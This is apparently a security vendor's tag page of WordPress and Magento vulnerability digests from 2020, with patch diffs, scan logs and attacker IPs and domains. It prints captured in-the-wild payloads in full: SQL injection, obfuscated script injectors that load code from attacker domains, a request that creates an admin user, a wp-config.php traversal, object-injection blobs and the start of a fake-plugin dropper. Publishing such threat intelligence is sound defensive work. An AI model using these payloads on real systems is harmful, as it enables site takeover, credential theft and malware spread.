Tag: Wordpress Plugins and Themes

Vulnerable Plugins: June 2020 Update

This is a mid-month update to our regular Monthly Vulnerability Digest, which reveals a number of new patches for disclosed vulnerabilities.

 

Plugin Vulnerability Patched Version Installs
Elementor Page Builder Authenticated Stored XSS 2.9.10 5000000
AdRotate Authenticated SQL Injection 5.8.4 40000
Brizy - Page Builder Improper Access Controls 1.0.126 60000
Careerfy Unauthenticated XSS 3.9.0 5000
SportsPress Authenticated Stored XSS 2.7.2 20000
JobSearch Unauthenticated XSS 1.5.1 5000
Newspaper Unauthenticated XSS 10.3.4 6000
Multi Scheduler Record Deletion CSRF -- 20

 

Highlights

  • Cross-site scripting is the most common vulnerability in WordPress plugins
  • None of these plugins have been identified in massive attacks

Relevant Plugins

SportsPress

Sportspress fixed an authenticated stored cross-site scripting vulnerability in version 2.7.2. This vulnerability allows authenticated attackers to arbitrarily update the “sportspress_event_teams_delimiter” plugin option, allowing for the potential execution of malicious scripts every time the site is loaded.

Since this bug is really easy for attackers to exploit in malware campaigns, we’ve been following it closely but haven’t detected any massive abuses as an attack vector. We believe this is primarily due to the fact that the vulnerability exploit requires access to a compromised user within the vulnerable site.

 

Patch:

Index: sportspress/tags/2.7.2/includes/admin/settings/class-sp-settings-events.php
===================================================================
--- a/sportspress/tags/2.7.2/includes/admin/settings/class-sp-settings-events.php
+++ b/sportspress/tags/2.7.2/includes/admin/settings/class-sp-settings-events.php         
         if ( isset( $_POST['sportspress_event_teams_delimiter'] ) )
-            update_option( 'sportspress_event_teams_delimiter', $_POST['sportspress_event_teams_delimiter'] );
+            update_option( 'sportspress_event_teams_delimiter', sanitize_text_field( $_POST['sportspress_event_teams_delimiter'] ) );
 }

 

AdRotate

Adrotate fixed an authenticated SQL Injection in version 5.8.4. We haven’t detected any massive automated attacks targeting this plugin.

Patch:

    if(isset($_GET['status'])) $status = esc_attr($_GET['status']);
     if(isset($_GET['view'])) $view = esc_attr($_GET['view']);
     if(isset($_GET['id'])) $id = esc_attr($_GET['id']);
     if(isset($_GET['file'])) $file = esc_attr($_GET['file']);
+
+    if(!is_numeric($status)) $status = 0;
+    if(!is_numeric($id)) $id = 0;

 

The majority of the public vulnerabilities in this mid-month update require the possession of a user account within the vulnerable site, which reduces the odds of any massive infections.

That being said, to mitigate risk from these recently patched vulnerabilities we strongly encourage all affected users to update their plugins as soon as possible.

Jun 19, 2020 by John Castro

Vulnerabilities Digest: May 2020

Relevant Plugins and Vulnerabilities:

Plugin Vulnerability Patched Version Installs
WP Product Review Unauthenticated Stored XSS 3.7.6 40000
Form Maker by 10Web Authenticated SQL Injection --- 100000
Add-on SweetAlert Contact Form 7 Authenticated XSS 1.0.8 20
Paid Memberships Pro Authenticated SQL Injection 2.3.3 90000
Visual Composer Authenticated XSS 27 80000
Team Members Authenticated XSS 5.0.4 40000
Photo Gallery by 10Web Unauthenticated SQL Injection 1.5.55 300000
Login/Signup Popup Authenticated XSS 1.5 10000
Easy Testimonials Authenticated Stored XSS 3.6 30000
WooCommerce Unescaped Metadata 4.1.0 5000000
Page Builder by SiteOrigin CSRF to XSS 2.10.16 1000000
Chopslider Authenticated SQL Injection --- 200
Elementor Pro Authenticated File Upload 2.9.4 100000
LearnPress Privilege Escalation 3.2.6.9 80000
Elementor Authenticated Stored XSS 2.9.8 4000000
Avada Authenticated Stored XSS 6.2.3 500000
Ninja Forms CSRF to Stored XSS 3.4.24.2 1000000
Advanced Order Export For Woo Authenticated XSS 3.1.4 90000
Quick Page/Post redirect Authenticated Settings Update --- 100000
Ultimate Addons for Elementor Registration Bypass 1.24.2 100000
WTI Like Post Authenticated XSS --- 10000
WP-Advanced-Search Authenticated SQL Injection 3.3.7 1000
Gmedia Photo Gallery Authenticated XSS 1.18.5 10000

Highlights for May 2020

  • Cross site scripting is still the most prevalent vulnerability. Bad actors are taking advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.
  • Unprotected AJAX action bugs are still on the rise. Attackers aren’t hesitating to automate malicious injections for vulnerable plugins.
  • Attackers have added three plugins and a series of new malicious IPs to their arsenal in an ongoing massive malware campaign targeting WordPress websites with known vulnerabilities.

Details for these highlights can be found under the components listed below.

WP Product Review

Two weeks ago, we reported an Unauthenticated Stored Cross Site Scripting in WP Product Review caused by a lack of protection in a rest route definition and improper handling of user input.

Only a few days after the disclosure of this vulnerability, attackers began to scan for vulnerable sites: 

181.58.21.65 - - [18/May/2020:17:21:10 +0000] "GET //wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"

139.198.16.241 - - [18/May/2020:17:15:36 +0000] "GET //wp-content/plugins/wp-product-review/readme.txt HTTP/1.1" 

185.162.127.248 - - [17/May/2020:03:38:15 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1" 

213.159.210.170 - - [17/May/2020:01:35:04 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"

Patch (version 3.7.6):

Index: wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
===================================================================
--- a/wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
+++ b/wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
@@ -97,4 +97,7 @@
                 'methods'  => 'POST',
                 'callback' => array( $this, 'update_review_callback' ),
+                'permission_callback' => function () {
+                    return current_user_can( 'edit_posts' );
+                },
                 'args'     => array(
                     'id' => array(

---

Index: wp-product-review/trunk/includes/functions.php
===================================================================
--- a/wp-product-review/trunk/includes/functions.php
+++ b/wp-product-review/trunk/includes/functions.php
@@ -229,5 +229,5 @@
         }
         ?>
-        <a title="<?php echo $review_object->get_name(); ?>" class="<?php echo $class_a; ?>" href="<?php echo esc_url( $image_link ); ?>" <?php echo $lightbox; ?> rel="nofollow" target="_blank">
+        <a title="<?php echo esc_attr( $review_object->get_name() ); ?>" class="<?php echo $class_a; ?>" href="<?php echo esc_url( $image_link ); ?>" <?php echo $lightbox; ?> rel="nofollow" target="_blank">
             <img
                 src="<?php echo esc_attr( $src ); ?>"

Elementor

Earlier this month, the plugin Elementor Pro fixed an arbitrary file upload vulnerability caused by an unprotected Ajax hook. It wasn’t long before attackers started exploiting this vulnerability.

Our team identified these malicious IPs trying to detect plugin installations for both Elementor Pro and Ultimate Addons for Elementor: 

69.164.207.140 - - [08/May/2020:15:59:31 +0000] "GET /wp-content/plugins/elementor-pro/assets/js/preview.min.js HTTP/1.1" 

45.79.193.100 - - [08/May/2020:16:49:13 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/css/modules/business-hours.css HTTP/1.1" 

62.210.172.66 - - [10/May/2020:02:33:29 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/min-js/uael-registration.min.js HTTP/1.1" 

62.210.84.69 - - [13/May/2020:08:13:57 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1" 

62.210.172.66 - - [13/May/2020:08:21:05 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1" 

[...]

Photo Gallery by 10Web

An unauthenticated SQL Injection was fixed this month in the plugin Photo Gallery.

Patch (version 1.5.55):

Index: photo-gallery/trunk/frontend/models/model.php
===================================================================
--- a/photo-gallery/trunk/frontend/models/model.php
+++ b/photo-gallery/trunk/frontend/models/model.php
@@ -197,32 +197,32 @@

   public function get_alb_gals_row( $bwg, $id, $albums_per_page, $sort_by, $order_by, $pagination_type = 0, $from = '' ) {
-    if ( $albums_per_page < 0 ) {
+    if ( $albums_per_page < 0 ) {
       $albums_per_page = 0;
     }
     global $wpdb;
-    $order_by = 'ORDER BY </span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>.</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>(</span><span style='color:#d2cd86; '>!</span>empty<span style='color:#d2cd86; '>(</span>$from<span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>&&</span> $from <span style='color:#d2cd86; '>===</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>widget</span><span style='color:#02d045; '>'</span><span style='color:#d2cd86; '>)</span> <span style='color:#b060b0; '>?</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>id</span><span style='color:#02d045; '>'</span> <span style='color:#b060b0; '>:</span> $sort_by <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>.</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '> ' . $order_by;
-    if( $sort_by == 'random' || $sort_by == 'RAND()' ) {
-      $order_by = 'ORDER BY RAND()';
-    }
-    $search_where = '';
-    $search_value = trim( WDWLibrary::get('bwg_search_' . $bwg) );
-    if ( !empty($search_value) ) {
-      $search_keys = explode(' ', $search_value);
+    $order_by = 'ORDER BY </span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>.</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>!</span>empty<span style='color:#d2cd86; '>(</span> $from <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>&&</span> $from <span style='color:#d2cd86; '>===</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>widget</span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>)</span> <span style='color:#b060b0; '>?</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>id</span><span style='color:#02d045; '>'</span> <span style='color:#b060b0; '>:</span> $sort_by <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>.</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '> ' . $order_by;
+    if ( $sort_by == 'random' || $sort_by == 'RAND()' ) {
+      $order_by = 'ORDER BY RAND()';
+    }
+    $search_where = '';
+    $search_value = trim( WDWLibrary::get( 'bwg_search_' . $bwg ) );
+    if ( !empty( $search_value ) ) {
+      $search_keys = explode( ' ', $search_value );
       $alt_search = '(';
       $description_search = '(';

Payload Used by Attackers:

185.162.127.248 -- POST -- /wp-admin/admin-ajax.php -- action=bwg_frontend_data&bwg_search_0=1%23+%25DFGDFG%22%29%29%2F%2A%2A%2FUNION%2F%2A%2A%2FALL%2F%2A%2A%2FSELECT%2F%2A%2A%2FTABLE_SCHEMA%2CTABLE_NAME%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2F%2A%2A%2Fas%2F%2A%2A%2Fdummy_3%2F%2A%2A%2Ffrom%2F%2A%2A%2Finformation_schema.tables%23FGDFGDFG%29%29%23&gallery_type=album_compact_preview&type_0=album -- 2020-05-17

Plugin & Theme Payloads Added to Ongoing Campaign

Malicious Domains & Detected IPs

Our team saw the following new malicious domains injected into an ongoing campaign exploiting known WordPress vulnerabilities this month: 

css[.]digestcolect[.]com
cls[.]balantfromsun[.]com
count[.]trackstatisticsss[.]com

The following IPs have also been associated with this campaign:

79.133.202.70
154.43.128.23
185.162.127.248
51.83.70.152
213.159.210.170
139.162.28.41
139.99.169.192
185.217.0.224
84.238.108.177
62.210.180.8
[...]

 

Exploit Attempts Seen in the Wild

Our team identified attacks against the following vulnerable plugins and themes.

Bold Page Builder (From Last Year)
139.162.28.41 -- POST -- /wp-admin/admin-ajax.php?action=bt_bb_set_custom_css -- css=%3C%2Fstyle%3E%3Cscript++type%3Dtext%2Fjavascript+language%3Djavascript%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C99%2C108%2C115%2C46%2C98%2C97%2C108%2C97%2C110%2C116%2C102%2C114%2C111%2C109%2C115%2C117%2C110%2C46%2C99%2C111%2C109%2C47%2C99%2C108%2C115%2C46%2C106%2C115%2C63%2C122%2C61%2C54%2C38%2C39%2C59%2C10%2C32%2C32%2C32%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C104%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cstyle%3E&post_id=1 -- 2020-05-12
WP Quick Booking Manager (from 4 years ago)
139.162.28.41 - action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Fcss.digestcolect.com%2Fstm%3Fv%3Dl6.0.0%27%3E%3C%2Fscript%3E%3Cstyle%3E&cssfix=front [12/May/2020:04:52:19 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"
Duplicator Download
62.210.180.8 - - [14/May/2020:14:45:54 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1"

Many other plugins are still under attack and public exploits already exist for all of the components listed above. Please check our previous lab notes for more information about this ongoing WordPress Malware campaign.

To mitigate threat, we strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.

May 29, 2020 by John Castro

Unauthenticated Stored Cross Site Scripting in WP Product...

 

Exploitation Level: Very Easy / Remote

DREAD Score: 7.4

Vulnerability: Persistent Cross-site Scripting

Patched Version: 3.7.6

 

During a routine research audit for our Sucuri Firewall, we discovered an Unauthenticated Persistent Cross-Site Scripting (XSS) affecting 40,000+ users of the WP Product Review plugin.

Current State of the Vulnerability

Though this security bug was fixed in the 3.7.6 release, older versions can be exploited by an attacker without any account in the vulnerable site. We are not aware of any exploit attempts currently using this vulnerability.

Disclosure / Response Timeline:

  • May 13, 2020: Initial contact.
  • May 14, 2020: Patch is live.

Technical Details

All user input data is sanitized but the WordPress function used can be bypassed when the parameter is set inside an HTML attribute. A successful attack results in malicious scripts being injected in all the site’s products.

unknown shell packer

Update as Soon as Possible

Unauthenticated attacks are very serious because they can be automated, making it easy for hackers to mount successful, widespread attacks against vulnerable websites. The number of active installs, the ease of exploitation, and the effects of a successful attack are what makes this vulnerability particularly dangerous.

To protect against this vulnerability, we strongly encourage WP Product Review users to update their plugin to version 3.7.6 as soon as possible. Users that are unable to update immediately can leverage the Sucuri Firewall or equivalent technology to virtually patch the vulnerability.

May 14, 2020 by John Castro

Vulnerabilities Digest: April 2020

Relevant Plugins and Vulnerabilities:

Plugin Vulnerability Patched Version Installs
Widget Settings Importer/Exporter Stored XSS Closed 40000
Accordion Stored/Reflected XSS 2.2.9 30000
Support Ticket System By Phoeniixx Reflected XSS Closed 2000
Gutenberg Blocks Authenticated Settings Change 1.14.8 200000
WP Lead Plus X Stored XSS 0.99 70000
OneTone Stored XSS Closed 20000
WP Advanced Search SQL Injection 3.3.6 1000
Easy Forms for Mailchimp Authenticated XSS 6.6.3 100000
CM Pop-Up banners Stored XSS 1.4.11 10000
Duplicate Page and Post SQL Injection 2.5.8 50000
WP post page close SQL Injection Closed ----

Highlights for April 2020

  • Developers are still falling short when sanitizing user input, leading to the exploitation of vulnerable third-party components.
  • Cross site scripting is still the most prevalent vulnerability. Bad actors are taking advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.
  • Unprotected AJAX action bugs are still on the rise. Attackers aren’t hesitating to automate malicious injections for vulnerable plugins.
  • Access bypass bugs continue to be the most critical vulnerability.
  • We saw a spike in attempts to exploit old Magento vulnerabilities

Details for these highlights can be found under the components listed below.

WP-Advanced-Search

Developers fixed an unauthenticated SQL Injection in WP-Advanced-Search which was caused by an improper handling of user input data.

Public PoC:

GET /wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_autosuggest&f=[malicious payload]

Patch (version 3.6):

Developers removed the “autocompletion-PHP5.5.php” file and added restrictions to multiple SQL queries. 

--- a/wp-advanced-search.old/class.inc/autocompletion/autocompletion-PHP5.5.php
+++ /dev/null
@@ -1,58 +0,0 @@
-<?php
-if(isset($_GET['q']) && !empty($_GET['q'])) {
-       $query = htmlspecialchars(stripslashes($_GET['q']));
-
-       // Récupération à la volée des informations transmises par le script d'autocomplétion
-       $table   = htmlspecialchars($_GET['t']);
-       $field   = htmlspecialchars($_GET['f']);
-       $type    = htmlspecialchars($_GET['type']);
-       $encode  = htmlspecialchars($_GET['e']);
[...]
-    // Requête de recherche dans l'index inversé (base de mots clés auto-générés)
-    // $requeteSQL = "SELECT DISTINCT ".$field." FROM ".$table." WHERE ".$field." LIKE '".$arg.$link->real_escape_string($query)."%' ORDER BY ".$field." ASC, idindex DESC LIMIT 0 , ".$limitS."";
-    $requeteSQL = "SELECT ".$field." FROM ".$table." WHERE ".$field." LIKE '".$arg.$link->real_escape_string($query)."%' ORDER BY ".$field." ASC, idindex DESC";

Support Ticket System By Phoeniixx

The plugin Support Ticket System By Phoeniixx was closed due to lack of maintenance, but existing users are still impacted by a reflected Cross Site Scripting vulnerability.

Public PoC:

GET  site.com/?view_id=[malicious payload]

Vulnerable Code: 

<script>

var newurl      = '<?php echo admin_url('admin-ajax.php') ;?>';                       
var get_val = '<?php echo (!empty($_GET['view_id']))?$_GET['view_id']:""; ?>';

</script>

Plugin & Theme Payloads Added to Ongoing Campaign

The Popup builder plugin allows site owners to easily create promotion popups. This past month, versions < 3.64 were affected by an unauthenticated stored XSS and attackers are still using it to infect thousands of sites.

Malicious domains injected this month

slow[.]destinyfernandi[.]com
ws[.]stivenfernando[.]com
stat[.]trackstatisticsss[.]com

Exploit Attempts Seen in the Wild

This past month, our team identified attacks against the following vulnerable plugins and themes.

OneTone theme (closed)
164.132.194.160 -- POST -- /wp-admin/admin-ajax.php -- action=onetone_options_import&options=%7B%22header_social_icons%22%3A%5B%5D%2C%22page_title_bar_background1%22%3A%7B%22background-color%22%3A%22%22%2C%22background[...]2C%22top_bar_info_content%22%3A%22%22%2C%22copyright%22%3A%22%3Cscript%3Eeval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,57,44,57,55,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125))%3B%3C%5C%2Fscript%3E%22%7D -- 2020-04-27
Popup Builder
185.212.128.162 -- POST -- /wp-admin/admin-ajax.php -- action=sgpb_autosave&allPopupData[...]%27on%27+%2B+eventName%2C+fn%29%3B%7D&allPopupData%5B92%5D%5Bname%5D=sgpb-WillOpen&allPopupData%5B92%5D%5Bvalue%5D=var+u+%3D+String.fromCharCode%28104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C115%2C46%2C115%2C116%2C105%2C118%2C101%2C110%2C102%2C101%2C114%2C110%2C97%2C110%2C100%2C111%2C46%2C99%2C111%2C109%2C47%2C115%2C116%2C109%2C63%2C118%2C61%2C46%2C49%2C119%2C115%2C51%2C46%2C49%2C46%2C56%2C46%2C49%2C46%2C49%29%3Bvar+d%3Ddocument%3Bvar+s%3Dd.createElement%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3B+s.type%3DString.fromCharCode%28116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%29%3B+var+pl+%3D+u%3B+s.src%3Dpl%3B+if+%28document.currentScript%29+%7B+document.currentScript.parentNode.insertBefore%28s%2C+document.currentScript%29%3B%7D+else+%7Bd.getElementsByTagName%28String.fromCharCode%28104%2C101%2C97%2C100%29%29%5B0%5D.appendChild%28s%29%3Bvar+list+%3D+document.getElementsByTagName%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3Blist.insertBefore%28s%2C+list.childNodes%5B0%5D%29%3B%7D&allPopupData%5B93%5D%5Bname%5D=sgpb-DidOpen&allPopupData%5B93%5D%5Bvalue%5D=+&allPopupData%5B94%5D%5Bname%5D=sgpb-ShouldClose&allPopupData%5B94%5D%5Bvalue%5D=var+u+%3D+String.fromCharCode%28104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C115%2C46%2C115%2C116%2C105%2C118%2C101%2C110%2C102%2C101%2C114%2C110%2C97%2C110%2C100%2C111%2C46%2C99%2C111%2C109%2C47%2C115%2C116%2C109%2C63%2C118%2C61%2C46%2C49%2C119%2C115%2C51%2C46%2C49%2C46%2C56%2C46%2C49%2C46%2C49%29%3Bvar+d%3Ddocument%3Bvar+s%3Dd.createElement%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3B+s.type%3DString.fromCharCode%28116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%29%3B+var+pl+%3D+u%3B+s.src%3Dpl%3B+if+%28document.currentScript%29+%7B+document.currentScript.parentNode.insertBefore%28s%2C+document.currentScript%29%3B%7D+else+%7Bd.getElementsByTagName%28String.fromCharCode%28104%2C101%2C97%2C100%29%29%5B0%5D.appendChild%28s%29%3Bvar+list+%3D+d[...]sgpb-css-editor&allPopupData%5B97%5D%5Bvalue%5D=

Many other plugins are still under attack. Please check our previous lab notes for more information.

Detected IPs
185.212.128.162
164.132.194.160
188.166.16.17
66.228.44.215
173.249.6.22
54.39.10.60
5.196.207.195
84.238.108.177
109.96.171.178
92.119.185.126

ThemeREX Addons

Back in February, we shared information about a critical vulnerability in ThemeREX Addons that was disclosed to the public and later on massively exploited by attackers.

Here is the full working exploit that attackers are using to compromise vulnerable sites. 

195.154.177.210 -- post -- /wp-json/trx_addons/v2/get/sc_layout?sc=wp_insert_user&role=administrator&user_login=ndvtzaifnz&user_pass=6Wlh6SA0RT -- - -- 2020-04-04
Detected IPs
195.154.177.210
5.135.143.224
84.238.108.177
109.96.171.178
92.119.185.126
82.77.172.62
82.78.189.130

Old Magento Versions Still Exploited

Unpatched Magento sites will be always targeted by attackers and that’s why we encourage users to implement all security patches in a timely manner. Multiple vulnerabilities were fixed two years ago and attackers are still taking advantage of them.

We've listed some of the exploits attackers are using to compromise vulnerable sites below.

Magento Made Cache - Object Injection

154.9.169.173 -- GET -- http://site.com/madecache/varnish/esi/?misc=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE2OiJleGl0KCJNYVphWWFOYSIpIjt9czoyMDoiACoAX2luZmxlY3RvckVuYWJsZWQiO2I6MTtzOjEwOiIAKgBfbGF5b3V0IjtzOjY6ImxheW91dCI7fXM6MjI6IgAqAF9zdWJqZWN0UHJlcGVuZFRleHQiO047fX19fQ== -- - -- 2020-04-15

Magento Magecart - Object Injection

23.229.39.178 -- POST -- /freegift/cart/gurlgift -- data=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE2OiJleGl0KCJNYVphWWFOYSIpIjt9czoyMDoiACoAX2luZmxlY3RvckVuYWJsZWQiO2I6MTtzOjEwOiIAKgBfbGF5b3V0IjtzOjY6ImxheW91dCI7fXM6MjI6IgAqAF9zdWJqZWN0UHJlcGVuZFRleHQiO047fX19fQ== -- 2020-04-14

Magento Core - SQL Injection

45.11.24.151 -- GET -- /catalog/product_frontend_action/synchronize?ids%5B0%5D%5Badded_at%5D=&type_id=recently_products&ids%5B0%5D%5Bproduct_id%5D%5Bto%5D=%29%29%29+OR+%28SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+123%3D123%29+--+-&ids%5B0%5D%5Bproduct_id%5D%5Bfrom%5D=%3F -- - -- 2020-04-26

Public exploits already exist for all of the components listed above. We strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.

May 1, 2020 by John Castro

Fake M-Shield WordPress Plugin

During a recent malware investigation, we found a fake WordPress plugin called M-Shield. We also found almost an identical plugin under the name kingof, with malicious code hosted in the file: ./wp-content/plugins/kingof/kingof.php

Based on the patterns commonly used for malware droppers, we suspect that this same plugin is circulating with a variety of different names. Since neither the M-Shield nor the kingof plugins exist in the official WordPress repository, the malicious component was most likely injected into the WordPress website after the initial compromise.

The plugin code loops through an array of “random” files to check if they exist and their filesize is lower than 1000 bytes. If the condition isn’t met, the script downloads this malicious wsos.txt file from 24hod[.]sk using the function file_get_contents() and injects into contents into the files from the $amb array.

<?php
function shield_01()
{
    $amb = array('wp-pwd.php', 'wp-shield.php', 'wp-logout.php', 'wp-config-proto.php', 'wp-content/themes/ms.cache.php');
    foreach($amb as $f) {
